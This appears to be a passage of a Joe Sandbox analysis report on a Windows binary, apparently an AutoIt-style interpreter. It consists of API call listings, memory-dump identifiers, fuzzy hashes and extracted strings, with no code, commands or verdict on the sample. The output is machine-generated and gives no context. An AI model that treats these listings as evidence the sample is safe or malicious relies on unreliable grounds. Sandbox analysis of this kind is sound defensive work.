                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00EB572E
                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00EB5739
                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00EB5744
                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00EB574F
                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00EB575A
                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00EB5765
                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00EB5770
                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00EB577B
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00EB5786
                                                                                                          • GetCursorInfo.USER32(?), ref: 00EB5796
                                                                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00EB57C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215588206-0
                                                                                                          • Opcode ID: 3a9dc65038770244ba9335d0b3bf09b7db7d2b5c7ceb946f8cfb817d9166981e
                                                                                                          • Instruction ID: aec3efb847f1eab00619bb768af7f2093e1f124d20a0e350fcbbcf46c889b07b
                                                                                                          • Opcode Fuzzy Hash: 3a9dc65038770244ba9335d0b3bf09b7db7d2b5c7ceb946f8cfb817d9166981e
                                                                                                          • Instruction Fuzzy Hash: 57414271E04319AADB109FBA9C49DAFFFF8EF51B10B10452BE519F7290DAB8A4008E51
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E9B17B
                                                                                                          • __swprintf.LIBCMT ref: 00E9B21C
                                                                                                          • _wcscmp.LIBCMT ref: 00E9B22F
                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E9B284
                                                                                                          • _wcscmp.LIBCMT ref: 00E9B2C0
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00E9B2F7
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00E9B349
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E9B37F
                                                                                                          • GetParent.USER32(?), ref: 00E9B39D
                                                                                                          • ScreenToClient.USER32(00000000), ref: 00E9B3A4
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E9B41E
                                                                                                          • _wcscmp.LIBCMT ref: 00E9B432
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00E9B458
                                                                                                          • _wcscmp.LIBCMT ref: 00E9B46C
                                                                                                            • Part of subcall function 00E6385C: _iswctype.LIBCMT ref: 00E63864
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                          • String ID: %s%u
                                                                                                          • API String ID: 3744389584-679674701
                                                                                                          • Opcode ID: a3af357bac938d9d2a6a1f9e68695413b41e942bbd776e8766f81f1879de540c
                                                                                                          • Instruction ID: ac9a9aee95ee2a3cfbd8af0da6e17a5d75a8534633d03ff16f4e76881daae830
                                                                                                          • Opcode Fuzzy Hash: a3af357bac938d9d2a6a1f9e68695413b41e942bbd776e8766f81f1879de540c
                                                                                                          • Instruction Fuzzy Hash: 62A10471204306AFDB14DF20E984FEAB7E8FF44358F00552AF9A9E6191E730E955CB91
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00E9BAB1
                                                                                                          • _wcscmp.LIBCMT ref: 00E9BAC2
                                                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E9BAEA
                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00E9BB07
                                                                                                          • _wcscmp.LIBCMT ref: 00E9BB25
                                                                                                          • _wcsstr.LIBCMT ref: 00E9BB36
                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E9BB6E
                                                                                                          • _wcscmp.LIBCMT ref: 00E9BB7E
                                                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E9BBA5
                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E9BBEE
                                                                                                          • _wcscmp.LIBCMT ref: 00E9BBFE
                                                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00E9BC26
                                                                                                          • GetWindowRect.USER32(00000004,?), ref: 00E9BC8F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                          • String ID: @$ThumbnailClass
                                                                                                          • API String ID: 1788623398-1539354611
                                                                                                          • Opcode ID: ff197c41562815ac77cdccc6244642ea8bfb37c2095305d86391d7b20d8d13cb
                                                                                                          • Instruction ID: 524e00cc46b7d74217fe9063fce57216ab3426125de94f5d2c05ff8ce57eca6b
                                                                                                          • Opcode Fuzzy Hash: ff197c41562815ac77cdccc6244642ea8bfb37c2095305d86391d7b20d8d13cb
                                                                                                          • Instruction Fuzzy Hash: 8581A4710043059FDF04DF14EA85FAAB7D8EF44318F14A56AFD85AA096EB30DD49CB61
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: af96f61da65acc718084a4322a008251ef6abf2fde9c045592c76905b367463c
• Instruction ID: 2144dd6cbe807a9b15861a18850cdf1084bba4c5b555a83115a944a39815e64b
• Opcode Fuzzy Hash: af96f61da65acc718084a4322a008251ef6abf2fde9c045592c76905b367463c
• Instruction Fuzzy Hash: 9E31BE70A80309A6CE14FAA0EE43FBD73F4AF10791F642529FA55B50D1EB566E08C652
APIs
• LoadIconW.USER32(00000063), ref: 00E9CBAA
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E9CBBC
• SetWindowTextW.USER32(?,?), ref: 00E9CBD3
• GetDlgItem.USER32(?,000003EA), ref: 00E9CBE8
• SetWindowTextW.USER32(00000000,?), ref: 00E9CBEE
• GetDlgItem.USER32(?,000003E9), ref: 00E9CBFE
• SetWindowTextW.USER32(00000000,?), ref: 00E9CC04
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E9CC25
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E9CC3F
• GetWindowRect.USER32(?,?), ref: 00E9CC48
• SetWindowTextW.USER32(?,?), ref: 00E9CCB3
• GetDesktopWindow.USER32 ref: 00E9CCB9
• GetWindowRect.USER32(00000000), ref: 00E9CCC0
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E9CD0C
• GetClientRect.USER32(?,?), ref: 00E9CD19
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E9CD3E
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E9CD69
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: dac891226ee0e3cf364c51fb7038dc3a5537582ac9f271221728b420f4a469a1
• Instruction ID: c3ec8b2b514daa253bd03706ce9bf4496488c0dec6b660e97506fb0e20cbe981
• Opcode Fuzzy Hash: dac891226ee0e3cf364c51fb7038dc3a5537582ac9f271221728b420f4a469a1
• Instruction Fuzzy Hash: 13518D70900709AFDB20EFA9DE89B6EBBF5FF44709F100919E556B25A0D770E914CB50
APIs
• _memset.LIBCMT ref: 00ECA87E
• DestroyWindow.USER32(00000000,?), ref: 00ECA8F8
  • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00ECA972
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00ECA994
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ECA9A7
• DestroyWindow.USER32(00000000), ref: 00ECA9C9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E40000,00000000), ref: 00ECAA00
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ECAA19
• GetDesktopWindow.USER32 ref: 00ECAA32
• GetWindowRect.USER32(00000000), ref: 00ECAA39
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00ECAA51
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00ECAA69
  • Part of subcall function 00E429AB: GetWindowLongW.USER32(?,000000EB), ref: 00E429BC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: e5721ce820abaee70a860997459c50c1bf5073a8f772c449880bf5b922916af2
• Instruction ID: 5834406a87e30c19a6630797b7dbdd2db5429b625ec89975795140cbac217eac
• Opcode Fuzzy Hash: e5721ce820abaee70a860997459c50c1bf5073a8f772c449880bf5b922916af2
• Instruction Fuzzy Hash: 3071A770140348AFD721DF28DD09F6A77E5FB88308F18452DF986A72A1D772E906DB52
APIs
  • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
• DragQueryPoint.SHELL32(?,?), ref: 00ECCCCF
  • Part of subcall function 00ECB1A9: ClientToScreen.USER32(?,?), ref: 00ECB1D2
  • Part of subcall function 00ECB1A9: GetWindowRect.USER32(?,?), ref: 00ECB248
  • Part of subcall function 00ECB1A9: PtInRect.USER32(?,?,00ECC6BC), ref: 00ECB258
• SendMessageW.USER32(?,000000B0,?,?), ref: 00ECCD38
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00ECCD43
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00ECCD66
• _wcscat.LIBCMT ref: 00ECCD96
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00ECCDAD
• SendMessageW.USER32(?,000000B0,?,?), ref: 00ECCDC6
• SendMessageW.USER32(?,000000B1,?,?), ref: 00ECCDDD
• SendMessageW.USER32(?,000000B1,?,?), ref: 00ECCDFF
• DragFinish.SHELL32(?), ref: 00ECCE06
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00ECCEF9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: 17d68401c6084adb0373c0e0eeff8ee37260854e4dbe0b8c14f070277b0796c8
• Instruction ID: 22fcf57f00ace69066a4936f44b30bfb0d1cbf2d21e967bdc683f66653354002
• Opcode Fuzzy Hash: 17d68401c6084adb0373c0e0eeff8ee37260854e4dbe0b8c14f070277b0796c8
• Instruction Fuzzy Hash: 10618F71508301AFC711EF50EC85E9FBBE8EFC8750F101A1EF695A61A1DB31AA49CB52
APIs
• VariantInit.OLEAUT32(00000000), ref: 00EA831A
• VariantCopy.OLEAUT32(00000000,?), ref: 00EA8323
• VariantClear.OLEAUT32(00000000), ref: 00EA832F
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00EA841D
• __swprintf.LIBCMT ref: 00EA844D
• VarR8FromDec.OLEAUT32(?,?), ref: 00EA8479
• VariantInit.OLEAUT32(?), ref: 00EA852A
• SysFreeString.OLEAUT32(?), ref: 00EA85BE
• VariantClear.OLEAUT32(?), ref: 00EA8618
• VariantClear.OLEAUT32(?), ref: 00EA8627
• VariantInit.OLEAUT32(00000000), ref: 00EA8665
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
• Opcode ID: 8c600ca48b6bebe8d5375d6ab96036d548ad3b3b366ece6d13c55b70dc36e3c9
• Instruction ID: 5d8ff6caee58ab48396353191db65c5ef0e4f8aae6fa0630fd3aef10e274e225
• Opcode Fuzzy Hash: 8c600ca48b6bebe8d5375d6ab96036d548ad3b3b366ece6d13c55b70dc36e3c9
• Instruction Fuzzy Hash: 75D1BD71A04515EBDF209F61D984BAEB7B4FF4AB01F14A556E815BF280DF30B848DBA0
APIs
• CharUpperBuffW.USER32(?,?), ref: 00EC4A61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC4AAC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 33d9080a74977da5ba21ddd1db243fba5f91e5868b365cc829478c4de0d09e4a
• Instruction ID: 28ac39782cf51ba5bcfa19bf3acab744f763b121d14d312f3711913d11d87bb3
• Opcode Fuzzy Hash: 33d9080a74977da5ba21ddd1db243fba5f91e5868b365cc829478c4de0d09e4a
• Instruction Fuzzy Hash: 90915AB02046119BCB04EF20D561F6AB7E1AF94354F14A95CF8967B3E2DB31ED4ACB81
APIs
• GetLocalTime.KERNEL32(?), ref: 00EAE31F
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00EAE32F
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EAE33B
• __wsplitpath.LIBCMT ref: 00EAE399
• _wcscat.LIBCMT ref: 00EAE3B1
• _wcscat.LIBCMT ref: 00EAE3C3
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EAE3D8
• SetCurrentDirectoryW.KERNEL32(?), ref: 00EAE3EC
• SetCurrentDirectoryW.KERNEL32(?), ref: 00EAE41E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00EAE43F
• _wcscpy.LIBCMT ref: 00EAE44B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EAE48A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: ed966cbf2f41e00d9111d370272948ad6ba499165a973281869d5448086f35e6
• Instruction ID: f5948dfca72903e602237e9efcf67b562020b98deb83954407edceb83531ad22
• Opcode Fuzzy Hash: ed966cbf2f41e00d9111d370272948ad6ba499165a973281869d5448086f35e6
• Instruction Fuzzy Hash: 26618AB25043059FC710EF60D844A9EB7E8FF89314F04991EF989AB251DB35F909CB92
APIs
  • Part of subcall function 00E41F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E42412,?,00000000,?,?,?,?,00E41AA7,00000000,?), ref: 00E41F76
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E424AF
• KillTimer.USER32(-00000001,?,?,?,?,00E41AA7,00000000,?,?,00E41EBE,?,?), ref: 00E4254A
• DestroyAcceleratorTable.USER32(00000000), ref: 00E7BFE7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E41AA7,00000000,?,?,00E41EBE,?,?), ref: 00E7C018
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E41AA7,00000000,?,?,00E41EBE,?,?), ref: 00E7C02F
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E41AA7,00000000,?,?,00E41EBE,?,?), ref: 00E7C04B
• DeleteObject.GDI32(00000000), ref: 00E7C05D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID: h
• API String ID: 641708696-1717268160
• Opcode ID: 9e9c83ca747aa79cbd0a31966f2817ba85d80ee21c4e64cba07b830ce9bbe853
• Instruction ID: d3873cbd973514d5711f1ebd4809d1e26d2e5b9b0cc437141f176b6e04e9fba2
• Opcode Fuzzy Hash: 9e9c83ca747aa79cbd0a31966f2817ba85d80ee21c4e64cba07b830ce9bbe853
• Instruction Fuzzy Hash: 0A61BB30905704DFCB25AF14E948B2A77F1FB4031AF64A56DE156BA960C371BC90EF91
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EAA2C2
  • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EAA2E3
• __swprintf.LIBCMT ref: 00EAA33C
• __swprintf.LIBCMT ref: 00EAA355
• _wprintf.LIBCMT ref: 00EAA3FC
• _wprintf.LIBCMT ref: 00EAA41A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
• Opcode ID: 8dfe506b51482b47d36002903c071a5f5759e199b3a356a19eb3f9e5d58a77c1
• Instruction ID: ce5252f5f3fb23b5e2292e6bda864222aaf7819e1cd5f9ecb7eff4390e025a47
• Opcode Fuzzy Hash: 8dfe506b51482b47d36002903c071a5f5759e199b3a356a19eb3f9e5d58a77c1
• Instruction Fuzzy Hash: 9D51B171900209AACF14EBE0DD46EEEB7B9AF09341F1415A5F905B2062EB352F58DB61
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,00E8F8B8,00000001,0000138C,00000001,00000002,00000001,?,00EB3FF9,00000002), ref: 00EA009A
• LoadStringW.USER32(00000000,?,00E8F8B8,00000001), ref: 00EA00A3
  • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
• GetModuleHandleW.KERNEL32(00000000,00F07310,?,00000FFF,?,?,00E8F8B8,00000001,0000138C,00000001,00000002,00000001,?,00EB3FF9,00000002,00000001), ref: 00EA00C5
• LoadStringW.USER32(00000000,?,00E8F8B8,00000001), ref: 00EA00C8
• __swprintf.LIBCMT ref: 00EA0118
• __swprintf.LIBCMT ref: 00EA0129
• _wprintf.LIBCMT ref: 00EA01D2
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EA01E9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: 30582d227ad3cd733790de92f82b46f818f095bdc6bf0481a7262e708778b8f2
• Instruction ID: 5d7908a314433d0dc3bb580855f4562d1009e92126cfa0d1a6bffb5a43e46384
• Opcode Fuzzy Hash: 30582d227ad3cd733790de92f82b46f818f095bdc6bf0481a7262e708778b8f2
• Instruction Fuzzy Hash: CC41A37280020DAACF14EBE0CD86EEEB7B8EF59341F501565F905B6092EA316F08CB61
APIs
  • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
  • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
• CharLowerBuffW.USER32(?,?), ref: 00EAAA0E
• GetDriveTypeW.KERNEL32 ref: 00EAAA5B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EAAAA3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EAAADA
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EAAB08
  • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
